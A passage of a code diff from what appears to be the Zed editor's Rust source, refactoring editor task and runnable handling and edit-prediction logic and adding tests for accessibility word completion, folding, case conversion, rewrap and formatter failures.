- let anchor_range = start_anchor.text_anchor..end_anchor.text_anchor;
linked_edits.push(&self, anchor_range, text.clone(), cx);
}
}
@@ -6649,6 +6763,7 @@ impl Editor {
completions_menu.completions.clone(),
candidate_id,
true,
+ all_commit_ranges,
cx,
);
@@ -6736,8 +6851,8 @@ impl Editor {
};
let buffer_id = buffer.read(cx).remote_id();
let tasks = self
- .tasks
- .get(&(buffer_id, buffer_row))
+ .runnables
+ .runnables((buffer_id, buffer_row))
.map(|t| Arc::new(t.to_owned()));
if !self.focus_handle.is_focused(window) {
@@ -7732,7 +7847,7 @@ impl Editor {
#[ztracing::instrument(skip_all)]
fn refresh_outline_symbols_at_cursor(&mut self, cx: &mut Context<Editor>) {
- if !self.mode.is_full() {
+ if !self.lsp_data_enabled() {
return;
}
let cursor = self.selections.newest_anchor().head();
@@ -7788,24 +7903,13 @@ impl Editor {
self.debounced_selection_highlight_complete = false;
}
if on_buffer_edit || query_changed {
- let multi_buffer_visible_start = self
- .scroll_manager
- .native_anchor(&display_snapshot, cx)
- .anchor
- .to_point(&multi_buffer_snapshot);
- let multi_buffer_visible_end = multi_buffer_snapshot.clip_point(
- multi_buffer_visible_start
- + Point::new(self.visible_line_count().unwrap_or(0.).ceil() as u32, 0),
- Bias::Left,
- );
- let multi_buffer_visible_range = multi_buffer_visible_start..multi_buffer_visible_end;
self.quick_selection_highlight_task = Some((
query_range.clone(),
self.update_selection_occurrence_highlights(
snapshot.buffer.clone(),
query_text.clone(),
query_range.clone(),
- multi_buffer_visible_range,
+ self.multi_buffer_visible_range(&display_snapshot, cx),
false,
window,
cx,
@@ -7840,6 +7944,27 @@ impl Editor {
}
}
+ pub fn multi_buffer_visible_range(
+ &self,
+ display_snapshot: &DisplaySnapshot,
+ cx: &App,
+ ) -> Range<Point> {
+ let visible_start = self
+ .scroll_manager
+ .native_anchor(display_snapshot, cx)
+ .anchor
+ .to_point(display_snapshot.buffer_snapshot())
+ .to_display_point(display_snapshot);
+
+ let mut target_end = visible_start;
+ *target_end.row_mut() += self.visible_line_count().unwrap_or(0.).ceil() as u32;
+
+ visible_start.to_point(display_snapshot)
+ ..display_snapshot
+ .clip_point(target_end, Bias::Right)
+ .to_point(display_snapshot)
+ }
+
pub fn refresh_edit_prediction(
&mut self,
debounce: bool,
@@ -7847,7 +7972,11 @@ impl Editor {
window: &mut Window,
cx: &mut Context<Self>,
) -> Option<()> {
- let provider = self.edit_prediction_provider()?;
+ if self.leader_id.is_some() {
+ self.discard_edit_prediction(EditPredictionDiscardReason::Ignored, cx);
+ return None;
+ }
+
let cursor = self.selections.newest_anchor().head();
let (buffer, cursor_buffer_position) =
self.buffer.read(cx).text_anchor_for_position(cursor, cx)?;
@@ -7872,7 +8001,8 @@ impl Editor {
return None;
}
- provider.refresh(buffer, cursor_buffer_position, debounce, cx);
+ self.edit_prediction_provider()?
+ .refresh(buffer, cursor_buffer_position, debounce, cx);
Some(())
}
@@ -7997,7 +8127,7 @@ impl Editor {
cx: &App,
) -> bool {
maybe!({
- if self.read_only(cx) {
+ if self.read_only(cx) || self.leader_id.is_some() {
return Some(false);
}
let provider = self.edit_prediction_provider()?;
@@ -8250,8 +8380,6 @@ impl Editor {
}
}
}
-
- self.edit_prediction_requires_modifier_in_indent_conflict = false;
}
pub fn accept_next_word_edit_prediction(
@@ -8403,9 +8531,12 @@ impl Editor {
window: &mut Window,
cx: &mut Context<Self>,
) {
+ self.update_edit_prediction_settings(cx);
+
// Ensure that the edit prediction preview is updated, even when not
// enabled, if there's an active edit prediction preview.
if self.show_edit_predictions_in_menu()
+ || self.edit_prediction_requires_modifier()
|| matches!(
self.edit_prediction_preview,
EditPredictionPreview::Active { .. }
@@ -8423,6 +8554,7 @@ impl Editor {
self.update_hovered_link(
position_map.point_for_position(mouse_position),
+ Some(mouse_position),
&position_map.snapshot,
modifiers,
window,
@@ -8497,25 +8629,7 @@ impl Editor {
window: &mut Window,
cx: &mut Context<Self>,
) {
- let mut modifiers_held = false;
-
- // Check bindings for all granularities.
- // If the user holds the key for Word, Line, or Full, we want to show the preview.
- let granularities = [
- EditPredictionGranularity::Full,
- EditPredictionGranularity::Line,
- EditPredictionGranularity::Word,
- ];
-
- for granularity in granularities {
- if let Some(keystroke) = self
- .accept_edit_prediction_keybind(granularity, window, cx)
- .keystroke()
- {
- modifiers_held = modifiers_held
- || (keystroke.modifiers() == modifiers && keystroke.modifiers().modified());
- }
- }
+ let modifiers_held = self.edit_prediction_preview_modifiers_held(modifiers, window, cx);
if modifiers_held {
if matches!(
@@ -8613,9 +8727,9 @@ impl Editor {
self.edit_prediction_settings =
self.edit_prediction_settings_at_position(&buffer, cursor_buffer_position, cx);
- self.edit_prediction_indent_conflict = multibuffer.is_line_whitespace_upto(cursor);
+ self.in_leading_whitespace = multibuffer.is_line_whitespace_upto(cursor);
- if self.edit_prediction_indent_conflict {
+ if self.in_leading_whitespace {
let cursor_point = cursor.to_point(&multibuffer);
let mut suggested_indent = None;
multibuffer.suggested_indents_callback(
@@ -8630,7 +8744,7 @@ impl Editor {
if let Some(indent) = suggested_indent
&& indent.len == cursor_point.column
{
- self.edit_prediction_indent_conflict = false;
+ self.in_leading_whitespace = false;
}
}
@@ -8808,19 +8922,6 @@ impl Editor {
Some(self.edit_prediction_provider.as_ref()?.provider.clone())
}
- fn clear_tasks(&mut self) {
- self.tasks.clear()
- }
-
- fn insert_tasks(&mut self, key: (BufferId, BufferRow), value: RunnableTasks) {
- if self.tasks.insert(key, value).is_some() {
- // This case should hopefully be rare, but just in case...
- log::error!(
- "multiple different run targets found on a single line, only the last target will be rendered"
- )
- }
- }
-
/// Get all display points of breakpoints that will be rendered within editor
///
/// This function is used to handle overlaps between breakpoints and Code action/runner symbol.
@@ -9198,156 +9299,6 @@ impl Editor {
})
}
- pub fn spawn_nearest_task(
- &mut self,
- action: &SpawnNearestTask,
- window: &mut Window,
- cx: &mut Context<Self>,
- ) {
- let Some((workspace, _)) = self.workspace.clone() else {
- return;
- };
- let Some(project) = self.project.clone() else {
- return;
- };
-
- // Try to find a closest, enclosing node using tree-sitter that has a task
- let Some((buffer, buffer_row, tasks)) = self
- .find_enclosing_node_task(cx)
- // Or find the task that's closest in row-distance.
- .or_else(|| self.find_closest_task(cx))
- else {
- return;
- };
-
- let reveal_strategy = action.reveal;
- let task_context = Self::build_tasks_context(&project, &buffer, buffer_row, &tasks, cx);
- cx.spawn_in(window, async move |_, cx| {
- let context = task_context.await?;
- let (task_source_kind, mut resolved_task) = tasks.resolve(&context).next()?;
-
- let resolved = &mut resolved_task.resolved;
- resolved.reveal = reveal_strategy;
-
- workspace
- .update_in(cx, |workspace, window, cx| {
- workspace.schedule_resolved_task(
- task_source_kind,
- resolved_task,
- false,
- window,
- cx,
- );
- })
- .ok()
- })
- .detach();
- }
-
- fn find_closest_task(
- &mut self,
- cx: &mut Context<Self>,
- ) -> Option<(Entity<Buffer>, u32, Arc<RunnableTasks>)> {
- let cursor_row = self
- .selections
- .newest_adjusted(&self.display_snapshot(cx))
- .head()
- .row;
-
- let ((buffer_id, row), tasks) = self
- .tasks
- .iter()
- .min_by_key(|((_, row), _)| cursor_row.abs_diff(*row))?;
-
- let buffer = self.buffer.read(cx).buffer(*buffer_id)?;
- let tasks = Arc::new(tasks.to_owned());
- Some((buffer, *row, tasks))
- }
-
- fn find_enclosing_node_task(
- &mut self,
- cx: &mut Context<Self>,
- ) -> Option<(Entity<Buffer>, u32, Arc<RunnableTasks>)> {
- let snapshot = self.buffer.read(cx).snapshot(cx);
- let offset = self
- .selections
- .newest::<MultiBufferOffset>(&self.display_snapshot(cx))
- .head();
- let mut excerpt = snapshot.excerpt_containing(offset..offset)?;
- let offset = excerpt.map_offset_to_buffer(offset);
- let buffer_id = excerpt.buffer().remote_id();
-
- let layer = excerpt.buffer().syntax_layer_at(offset)?;
- let mut cursor = layer.node().walk();
-
- while cursor.goto_first_child_for_byte(offset.0).is_some() {
- if cursor.node().end_byte() == offset.0 {
- cursor.goto_next_sibling();
- }
- }
-
- // Ascend to the smallest ancestor that contains the range and has a task.
- loop {
- let node = cursor.node();
- let node_range = node.byte_range();
- let symbol_start_row = excerpt.buffer().offset_to_point(node.start_byte()).row;
-
- // Check if this node contains our offset
- if node_range.start <= offset.0 && node_range.end >= offset.0 {
- // If it contains offset, check for task
- if let Some(tasks) = self.tasks.get(&(buffer_id, symbol_start_row)) {
- let buffer = self.buffer.read(cx).buffer(buffer_id)?;
- return Some((buffer, symbol_start_row, Arc::new(tasks.to_owned())));
- }
- }
-
- if !cursor.goto_parent() {
- break;
- }
- }
- None
- }
-
- fn render_run_indicator(
- &self,
- _style: &EditorStyle,
- is_active: bool,
- row: DisplayRow,
- breakpoint: Option<(Anchor, Breakpoint, Option<BreakpointSessionState>)>,
- cx: &mut Context<Self>,
- ) -> IconButton {
- let color = Color::Muted;
- let position = breakpoint.as_ref().map(|(anchor, _, _)| *anchor);
-
- IconButton::new(
- ("run_indicator", row.0 as usize),
- ui::IconName::PlayOutlined,
- )
- .shape(ui::IconButtonShape::Square)
- .icon_size(IconSize::XSmall)
- .icon_color(color)
- .toggle_state(is_active)
- .on_click(cx.listener(move |editor, e: &ClickEvent, window, cx| {
- let quick_launch = match e {
- ClickEvent::Keyboard(_) => true,
- ClickEvent::Mouse(e) => e.down.button == MouseButton::Left,
- };
-
- window.focus(&editor.focus_handle(cx), cx);
- editor.toggle_code_actions(
- &ToggleCodeActions {
- deployed_from: Some(CodeActionSource::RunMenu(row)),
- quick_launch,
- },
- window,
- cx,
- );
- }))
- .on_right_click(cx.listener(move |editor, event: &ClickEvent, window, cx| {
- editor.set_breakpoint_context_menu(row, position, event.position(), window, cx);
- }))
- }
-
pub fn context_menu_visible(&self) -> bool {
!self.edit_prediction_preview_is_active()
&& self
@@ -5,6 +5,7 @@ use crate::{
edit_prediction_tests::FakeEditPredictionDelegate,
element::StickyHeader,
linked_editing_ranges::LinkedEditingRanges,
+ runnables::RunnableTasks,
scroll::scroll_amount::ScrollAmount,
test::{
assert_text_with_selections, build_editor, editor_content_with_blocks,
@@ -25,7 +26,7 @@ use language::{
BracketPairConfig,
Capability::ReadWrite,
DiagnosticSourceKind, FakeLspAdapter, IndentGuideSettings, LanguageConfig,
- LanguageConfigOverride, LanguageMatcher, LanguageName, Override, Point,
+ LanguageConfigOverride, LanguageMatcher, LanguageName, LanguageQueries, Override, Point,
language_settings::{
CompletionSettingsContent, FormatterList, LanguageSettingsContent, LspInsertMode,
},
@@ -50,6 +51,7 @@ use settings::{
IndentGuideBackgroundColoring, IndentGuideColoring, InlayHintSettingsContent,
ProjectSettingsContent, SearchSettingsContent, SettingsContent, SettingsStore,
};
+use std::borrow::Cow;
use std::{cell::RefCell, future::Future, rc::Rc, sync::atomic::AtomicBool, time::Instant};
use std::{
iter,
@@ -318,6 +320,71 @@ fn test_undo_redo_with_selection_restoration(cx: &mut TestAppContext) {
});
}
+#[gpui::test]
+fn test_accessibility_keyboard_word_completion(cx: &mut TestAppContext) {
+ init_test(cx, |_| {});
+
+ // Simulates the macOS Accessibility Keyboard word completion panel, which calls
+ // insertText:replacementRange: to commit a completion. macOS sends two calls per
+ // completion: one with a non-empty range replacing the typed prefix, and one with
+ // an empty replacement range (cursor..cursor) to append a trailing space.
+
+ cx.add_window(|window, cx| {
+ let buffer = MultiBuffer::build_simple("ab", cx);
+ let mut editor = build_editor(buffer, window, cx);
+
+ // Cursor is after the 2-char prefix "ab" at offset 2.
+ editor.change_selections(SelectionEffects::no_scroll(), window, cx, |s| {
+ s.select_ranges([MultiBufferOffset(2)..MultiBufferOffset(2)])
+ });
+
+ // macOS completes "about" by replacing the prefix via range 0..2.
+ editor.replace_text_in_range(Some(0..2), "about", window, cx);
+ assert_eq!(editor.text(cx), "about");
+
+ // macOS sends a trailing space as an empty replacement range (cursor..cursor).
+ // Must insert at the cursor position, not call backspace first (which would
+ // delete the preceding character).
+ editor.replace_text_in_range(Some(5..5), " ", window, cx);
+ assert_eq!(editor.text(cx), "about ");
+
+ editor
+ });
+
+ // Multi-cursor: the replacement must fan out to all cursors, and the trailing
+ // space must land at each cursor's actual current position. After the first
+ // completion, macOS's reported cursor offset is stale (it doesn't account for
+ // the offset shift caused by the other cursor's insertion), so the empty
+ // replacement range must be ignored and the space inserted at each real cursor.
+ cx.add_window(|window, cx| {
+ // Two cursors, each after a 2-char prefix "ab" at the end of each line:
+ // "ab\nab" — cursors at offsets 2 and 5.
+ let buffer = MultiBuffer::build_simple("ab\nab", cx);
+ let mut editor = build_editor(buffer, window, cx);
+
+ editor.change_selections(SelectionEffects::no_scroll(), window, cx, |s| {
+ s.select_ranges([
+ MultiBufferOffset(2)..MultiBufferOffset(2),
+ MultiBufferOffset(5)..MultiBufferOffset(5),
+ ])
+ });
+
+ // macOS reports the newest cursor (offset 5) and sends range 3..5 to
+ // replace its 2-char prefix. selection_replacement_ranges applies the same
+ // delta to fan out to both cursors: 0..2 and 3..5.
+ editor.replace_text_in_range(Some(3..5), "about", window, cx);
+ assert_eq!(editor.text(cx), "about\nabout");
+
+ // Trailing space via empty range. macOS thinks the cursor is at offset 10
+ // (5 - 2 + 7 = 10), but the actual cursors are at 5 and 11. The stale
+ // offset must be ignored and the space inserted at each real cursor position.
+ editor.replace_text_in_range(Some(10..10), " ", window, cx);
+ assert_eq!(editor.text(cx), "about \nabout ");
+
+ editor
+ });
+}
+
#[gpui::test]
fn test_ime_composition(cx: &mut TestAppContext) {
init_test(cx, |_| {});
@@ -1323,6 +1390,105 @@ fn test_fold_action_multiple_line_breaks(cx: &mut TestAppContext) {
});
}
+#[gpui::test]
+async fn test_fold_with_unindented_multiline_raw_string(cx: &mut TestAppContext) {
+ init_test(cx, |_| {});
+
+ let mut cx = EditorTestContext::new(cx).await;
+
+ let language = Arc::new(
+ Language::new(
+ LanguageConfig::default(),
+ Some(tree_sitter_rust::LANGUAGE.into()),
+ )
+ .with_queries(LanguageQueries {
+ overrides: Some(Cow::from(indoc! {"
+ [
+ (string_literal)
+ (raw_string_literal)
+ ] @string
+ [
+ (line_comment)
+ (block_comment)
+ ] @comment.inclusive
+ "})),
+ ..Default::default()
+ })
+ .expect("Could not parse queries"),
+ );
+
+ cx.update_buffer(|buffer, cx| buffer.set_language(Some(language), cx));
+ cx.set_state(indoc! {"
+ fn main() {
+ let s = r#\"
+ a
+ b
+ c
+ \"#;
+ }ˇ
+ "});
+
+ cx.update_editor(|editor, window, cx| {
+ editor.fold_at_level(&FoldAtLevel(1), window, cx);
+ assert_eq!(
+ editor.display_text(cx),
+ indoc! {"
+ fn main() {⋯
+ }
+ "},
+ );
+ });
+}
+
+#[gpui::test]
+async fn test_fold_with_unindented_multiline_block_comment(cx: &mut TestAppContext) {
+ init_test(cx, |_| {});
+
+ let mut cx = EditorTestContext::new(cx).await;
+
+ let language = Arc::new(
+ Language::new(
+ LanguageConfig::default(),
+ Some(tree_sitter_rust::LANGUAGE.into()),
+ )
+ .with_queries(LanguageQueries {
+ overrides: Some(Cow::from(indoc! {"
+ [
+ (string_literal)
+ (raw_string_literal)
+ ] @string
+ [
+ (line_comment)
+ (block_comment)
+ ] @comment.inclusive
+ "})),
+ ..Default::default()
+ })
+ .expect("Could not parse queries"),
+ );
+
+ cx.update_buffer(|buffer, cx| buffer.set_language(Some(language), cx));
+ cx.set_state(indoc! {"
+ fn main() {
+ let x = 1;
+ /*
+ unindented comment line
+ */
+ }ˇ
+ "});
+
+ cx.update_editor(|editor, window, cx| {
+ editor.fold_at_level(&FoldAtLevel(1), window, cx);
+ assert_eq!(
+ editor.display_text(cx),
+ indoc! {"
+ fn main() {⋯
+ }
+ "},
+ );
+ });
+}
+
#[gpui::test]
fn test_fold_at_level(cx: &mut TestAppContext) {
init_test(cx, |_| {});
@@ -1867,6 +2033,56 @@ fn test_beginning_end_of_line(cx: &mut TestAppContext) {
});
}
+#[gpui::test]
+fn test_beginning_of_line_single_line_editor(cx: &mut TestAppContext) {
+ init_test(cx, |_| {});
+
+ let editor = cx.add_window(|window, cx| Editor::single_line(window, cx));
+
+ _ = editor.update(cx, |editor, window, cx| {
+ editor.set_text(" indented text", window, cx);
+ editor.change_selections(SelectionEffects::no_scroll(), window, cx, |s| {
+ s.select_display_ranges([
+ DisplayPoint::new(DisplayRow(0), 10)..DisplayPoint::new(DisplayRow(0), 10)
+ ]);
+ });
+
+ editor.move_to_beginning_of_line(
+ &MoveToBeginningOfLine {
+ stop_at_soft_wraps: true,
+ stop_at_indent: true,
+ },
+ window,
+ cx,
+ );
+ assert_eq!(
+ display_ranges(editor, cx),
+ &[DisplayPoint::new(DisplayRow(0), 0)..DisplayPoint::new(DisplayRow(0), 0)]
+ );
+ });
+
+ _ = editor.update(cx, |editor, window, cx| {
+ editor.change_selections(SelectionEffects::no_scroll(), window, cx, |s| {
+ s.select_display_ranges([
+ DisplayPoint::new(DisplayRow(0), 10)..DisplayPoint::new(DisplayRow(0), 10)
+ ]);
+ });
+
+ editor.select_to_beginning_of_line(
+ &SelectToBeginningOfLine {
+ stop_at_soft_wraps: true,
+ stop_at_indent: true,
+ },
+ window,
+ cx,
+ );
+ assert_eq!(
+ display_ranges(editor, cx),
+ &[DisplayPoint::new(DisplayRow(0), 10)..DisplayPoint::new(DisplayRow(0), 0)]
+ );
+ });
+}
+
#[gpui::test]
fn test_beginning_end_of_line_ignore_soft_wrap(cx: &mut TestAppContext) {
init_test(cx, |_| {});
@@ -6217,6 +6433,77 @@ async fn test_manipulate_text(cx: &mut TestAppContext) {
«HeLlO, wOrLD!ˇ»
"});
+ // Test that case conversions backed by `to_case` preserve leading/trailing whitespace.
+ cx.set_state(indoc! {"
+ « hello worldˇ»
+ "});
+ cx.update_editor(|e, window, cx| e.convert_to_title_case(&ConvertToTitleCase, window, cx));
+ cx.assert_editor_state(indoc! {"
+ « Hello Worldˇ»
+ "});
+
+ cx.set_state(indoc! {"
+ « hello worldˇ»
+ "});
+ cx.update_editor(|e, window, cx| {
+ e.convert_to_upper_camel_case(&ConvertToUpperCamelCase, window, cx)
+ });
+ cx.assert_editor_state(indoc! {"
+ « HelloWorldˇ»
+ "});
+
+ cx.set_state(indoc! {"
+ « hello worldˇ»
+ "});
+ cx.update_editor(|e, window, cx| {
+ e.convert_to_lower_camel_case(&ConvertToLowerCamelCase, window, cx)
+ });
+ cx.assert_editor_state(indoc! {"
+ « helloWorldˇ»
+ "});
+
+ cx.set_state(indoc! {"
+ « hello worldˇ»
+ "});
+ cx.update_editor(|e, window, cx| e.convert_to_snake_case(&ConvertToSnakeCase, window, cx));
+ cx.assert_editor_state(indoc! {"
+ « hello_worldˇ»
+ "});
+
+ cx.set_state(indoc! {"
+ « hello worldˇ»
+ "});
+ cx.update_editor(|e, window, cx| e.convert_to_kebab_case(&ConvertToKebabCase, window, cx));
+ cx.assert_editor_state(indoc! {"
+ « hello-worldˇ»
+ "});
+
+ cx.set_state(indoc! {"
+ « hello worldˇ»
+ "});
+ cx.update_editor(|e, window, cx| {
+ e.convert_to_sentence_case(&ConvertToSentenceCase, window, cx)
+ });
+ cx.assert_editor_state(indoc! {"
+ « Hello worldˇ»
+ "});
+
+ cx.set_state(indoc! {"
+ « hello world\t\tˇ»
+ "});
+ cx.update_editor(|e, window, cx| e.convert_to_title_case(&ConvertToTitleCase, window, cx));
+ cx.assert_editor_state(indoc! {"
+ « Hello World\t\tˇ»
+ "});
+
+ cx.set_state(indoc! {"
+ « hello world\t\tˇ»
+ "});
+ cx.update_editor(|e, window, cx| e.convert_to_snake_case(&ConvertToSnakeCase, window, cx));
+ cx.assert_editor_state(indoc! {"
+ « hello_world\t\tˇ»
+ "});
+
// Test selections with `line_mode() = true`.
cx.update_editor(|editor, _window, _cx| editor.selections.set_line_mode(true));
cx.set_state(indoc! {"
@@ -7175,6 +7462,48 @@ async fn test_rewrap(cx: &mut TestAppContext) {
also very long and should not merge
with the numbered item.ˇ»
"},
+ markdown_language.clone(),
+ &mut cx,
+ );
+
+ // Test that empty selection rewrap on a numbered list item does not merge adjacent items
+ assert_rewrap(
+ indoc! {"
+ 1. This is the first numbered list item that is very long and needs to be wrapped properly.
+ 2. ˇThis is the second numbered list item that is also very long and needs to be wrapped.
+ 3. This is the third numbered list item, shorter.
+ "},
+ indoc! {"
+ 1. This is the first numbered list item
+ that is very long and needs to be
+ wrapped properly.
+ 2. ˇThis is the second numbered list item
+ that is also very long and needs to
+ be wrapped.
+ 3. This is the third numbered list item,
+ shorter.
+ "},
+ markdown_language.clone(),
+ &mut cx,
+ );
+
+ // Test that empty selection rewrap on a bullet list item does not merge adjacent items
+ assert_rewrap(
+ indoc! {"
+ - This is the first bullet item that is very long and needs wrapping properly here.
+ - ˇThis is the second bullet item that is also very long and needs to be wrapped.
+ - This is the third bullet item, shorter.
+ "},
+ indoc! {"
+ - This is the first bullet item that is
+ very long and needs wrapping properly
+ here.
+ - ˇThis is the second bullet item that is
+ also very long and needs to be
+ wrapped.
+ - This is the third bullet item,
+ shorter.
+ "},
markdown_language,
&mut cx,
);
@@ -9324,6 +9653,28 @@ async fn test_add_selection_above_below_multi_cursor_existing_state(cx: &mut Tes
));
}
+#[gpui::test]
+async fn test_add_selection_above_below_multibyte(cx: &mut TestAppContext) {
+ init_test(cx, |_| {});
+ let mut cx = EditorTestContext::new(cx).await;
+
+ // Cursor after "Häl" (byte column 4, char column 3) should align to
+ // char column 3 on the ASCII line below, not byte column 4.
+ cx.set_state(indoc!(
+ r#"Hälˇlö
+ Hallo"#
+ ));
+
+ cx.update_editor(|editor, window, cx| {
+ editor.add_selection_below(&Default::default(), window, cx);
+ });
+
+ cx.assert_editor_state(indoc!(
+ r#"Hälˇlö
+ Halˇlo"#
+ ));
+}
+
#[gpui::test]
async fn test_select_next(cx: &mut TestAppContext) {
init_test(cx, |_| {});
@@ -9935,7 +10286,7 @@ async fn test_select_larger_smaller_syntax_node(cx: &mut TestAppContext) {
use mod1::mod2::{mod3, «mod4ˇ»};
fn fn_1«ˇ(param1: bool, param2: &str)» {
- let var1 = "«ˇtext»";
+ let var1 = "«textˇ»";
}
"#},
cx,
@@ -10007,7 +10358,7 @@ async fn test_select_larger_smaller_syntax_node(cx: &mut TestAppContext) {
use mod1::mod2::{mod3, «mod4ˇ»};
fn fn_1«ˇ(param1: bool, param2: &str)» {
- let var1 = "«ˇtext»";
+ let var1 = "«textˇ»";
}
"#},
cx,
@@ -10076,7 +10427,32 @@ async fn test_select_larger_smaller_syntax_node(cx: &mut TestAppContext) {
use mod1::mod2::«{mod3, mod4}ˇ»;
fn fn_1«ˇ(param1: bool, param2: &str)» {
- let var1 = "«ˇtext»";
+ let var1 = "«textˇ»";
+ }
+ "#},
+ cx,
+ );
+ });
+
+ // Ensure multiple cursors have consistent direction after expanding
+ editor.update_in(cx, |editor, window, cx| {
+ editor.unfold_all(&UnfoldAll, window, cx);
+ editor.change_selections(SelectionEffects::no_scroll(), window, cx, |s| {
+ s.select_display_ranges([
+ DisplayPoint::new(DisplayRow(0), 25)..DisplayPoint::new(DisplayRow(0), 25),
+ DisplayPoint::new(DisplayRow(3), 18)..DisplayPoint::new(DisplayRow(3), 18),
+ ]);
+ });
+ editor.select_larger_syntax_node(&SelectLargerSyntaxNode, window, cx);
+ });
+ editor.update(cx, |editor, cx| {
+ assert_text_with_selections(
+ editor,
+ indoc! {r#"
+ use mod1::mod2::{mod3, «mod4ˇ»};
+
+ fn fn_1(param1: bool, param2: &str) {
+ let var1 = "«textˇ»";
}
"#},
cx,
@@ -14272,6 +14648,107 @@ async fn test_organize_imports_manual_trigger(cx: &mut TestAppContext) {
);
}
+#[gpui::test]
+async fn test_formatter_failure_does_not_abort_subsequent_formatters(cx: &mut TestAppContext) {
+ init_test(cx, |settings| {
+ settings.defaults.formatter = Some(FormatterList::Vec(vec![
+ Formatter::LanguageServer(settings::LanguageServerFormatterSpecifier::Current),
+ Formatter::CodeAction("organize-imports".into()),
+ ]))
+ });
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_file(path!("/file.rs"), "fn main() {}\n".into())
+ .await;
+
+ let project = Project::test(fs, [path!("/").as_ref()], cx).await;
+ let language_registry = project.read_with(cx, |project, _| project.languages().clone());
+ language_registry.add(rust_lang());
+
+ let mut fake_servers = language_registry.register_fake_lsp(
+ "Rust",
+ FakeLspAdapter {
+ capabilities: lsp::ServerCapabilities {
+ document_formatting_provider: Some(lsp::OneOf::Left(true)),
+ code_action_provider: Some(lsp::CodeActionProviderCapability::Simple(true)),
+ ..Default::default()
+ },
+ ..Default::default()
+ },
+ );
+
+ let buffer = project
+ .update(cx, |project, cx| {
+ project.open_local_buffer(path!("/file.rs"), cx)
+ })
+ .await
+ .unwrap();
+
+ let buffer = cx.new(|cx| MultiBuffer::singleton(buffer, cx));
+ let (editor, cx) = cx.add_window_view(|window, cx| {
+ build_editor_with_project(project.clone(), buffer, window, cx)
+ });
+
+ let fake_server = fake_servers.next().await.unwrap();
+
+ // Formatter #1 (LanguageServer) returns an error to simulate failure
+ fake_server.set_request_handler::<lsp::request::Formatting, _, _>(
+ move |_params, _| async move { Err(anyhow::anyhow!("Simulated formatter failure")) },
+ );
+
+ // Formatter #2 (CodeAction) returns a successful edit
+ fake_server.set_request_handler::<lsp::request::CodeActionRequest, _, _>(
+ move |_params, _| async move {
+ let uri = lsp::Uri::from_file_path(path!("/file.rs")).unwrap();
+ Ok(Some(vec![lsp::CodeActionOrCommand::CodeAction(
+ lsp::CodeAction {
+ kind: Some("organize-imports".into()),
+ edit: Some(lsp::WorkspaceEdit::new(
+ [(
+ uri,
+ vec![lsp::TextEdit::new(
+ lsp::Range::new(lsp::Position::new(0, 0), lsp::Position::new(0, 0)),
+ "use std::io;\n".to_string(),
+ )],
+ )]
+ .into_iter()
+ .collect(),
+ )),
+ ..Default::default()
+ },
+ )]))
+ },
+ );
+
+ fake_server.set_request_handler::<lsp::request::CodeActionResolveRequest, _, _>({
+ move |params, _| async move { Ok(params) }
+ });
+
+ editor
+ .update_in(cx, |editor, window, cx| {
+ editor.perform_format(
+ project.clone(),
+ FormatTrigger::Manual,
+ FormatTarget::Buffers(editor.buffer().read(cx).all_buffers()),
+ window,
+ cx,
+ )
+ })
+ .unwrap()
+ .await;
+
+ // Formatter #1 (LanguageServer) failed, but formatter #2 (CodeAction) should have applied
+ editor.update(cx, |editor, cx| {
+ assert_eq!(editor.text(cx), "use std::io;\nfn main() {}\n");
+ });
+
+ // The entire format operation should undo as one transaction
+ editor.update_in(cx, |editor, window, cx| {
+ editor.undo(&Default::default(), window, cx);
+ assert_eq!(editor.text(cx), "fn main() {}\n");
+ });
+}
+
#[gpui::test]
async fn test_concurrent_format_requests(cx: &mut TestAppContext) {
init_test(cx, |_| {});
@@ -19206,6 +19683,260 @@ fn test_split_words_for_snippet_prefix() {
assert_eq!(split("a.s"), &["s", ".s", "a.s"]);
}
+#[gpui::test]
+async fn test_move_to_syntax_node_relative_jumps(tcx: &mut TestAppContext) {
+ init_test(tcx, |_| {});
+
+ let mut cx = EditorLspTestContext::new(
+ Arc::into_inner(markdown_lang()).unwrap(),
+ Default::default(),
+ tcx,
+ )
+ .await;
+
+ async fn assert(offset: i8, before: &str, after: &str, cx: &mut EditorLspTestContext) {
+ let _state_context = cx.set_state(before);
+ cx.run_until_parked();
+ cx.update_editor(|editor, window, cx| editor.go_to_symbol_by_offset(window, cx, offset))
+ .await
+ .unwrap();
+ cx.run_until_parked();
+ cx.assert_editor_state(after);
+ }
+
+ const ABOVE: i8 = -1;
+ const BELOW: i8 = 1;
+
+ assert(
+ ABOVE,
+ indoc! {"
+ # Foo
+
+ ˇFoo foo foo
+
+ # Bar
+
+ Bar bar bar
+ "},
+ indoc! {"
+ ˇ# Foo
+
+ Foo foo foo
+
+ # Bar
+
+ Bar bar bar
+ "},
+ &mut cx,
+ )
+ .await;
+
+ assert(
+ ABOVE,
+ indoc! {"
+ ˇ# Foo
+
+ Foo foo foo
+
+ # Bar
+
+ Bar bar bar
+ "},
+ indoc! {"
+ ˇ# Foo
+
+ Foo foo foo
+
+ # Bar
+
+ Bar bar bar
+ "},
+ &mut cx,
+ )
+ .await;
+
+ assert(
+ BELOW,
+ indoc! {"
+ ˇ# Foo
+
+ Foo foo foo
+
+ # Bar
+
+ Bar bar bar
+ "},
+ indoc! {"
+ # Foo
+
+ Foo foo foo
+
+ ˇ# Bar
+
+ Bar bar bar
+ "},
+ &mut cx,
+ )
+ .await;
+
+ assert(
+ BELOW,
+ indoc! {"
+ # Foo
+
+ ˇFoo foo foo
+
+ # Bar
+
+ Bar bar bar
+ "},
+ indoc! {"
+ # Foo
+
+ Foo foo foo
+
+ ˇ# Bar
+
+ Bar bar bar
+ "},
+ &mut cx,
+ )
+ .await;
+
+ assert(
+ BELOW,
+ indoc! {"
+ # Foo
+
+ Foo foo foo
+
+ ˇ# Bar
+
+ Bar bar bar
+ "},
+ indoc! {"
+ # Foo
+
+ Foo foo foo
+
+ ˇ# Bar
+
+ Bar bar bar
+ "},
+ &mut cx,
+ )
+ .await;
+
+ assert(
+ BELOW,
+ indoc! {"
+ # Foo
+
+ Foo foo foo
+
+ # Bar
+ ˇ
+ Bar bar bar
+ "},
+ indoc! {"
+ # Foo
+
+ Foo foo foo
+
+ # Bar
+ ˇ
+ Bar bar bar
+ "},
+ &mut cx,
+ )
+ .await;
+}
+
+#[gpui::test]
+async fn test_move_to_syntax_node_relative_dead_zone(tcx: &mut TestAppContext) {
+ init_test(tcx, |_| {});
+
+ let mut cx = EditorLspTestContext::new(
+ Arc::into_inner(rust_lang()).unwrap(),
+ Default::default(),
+ tcx,
+ )
+ .await;
+
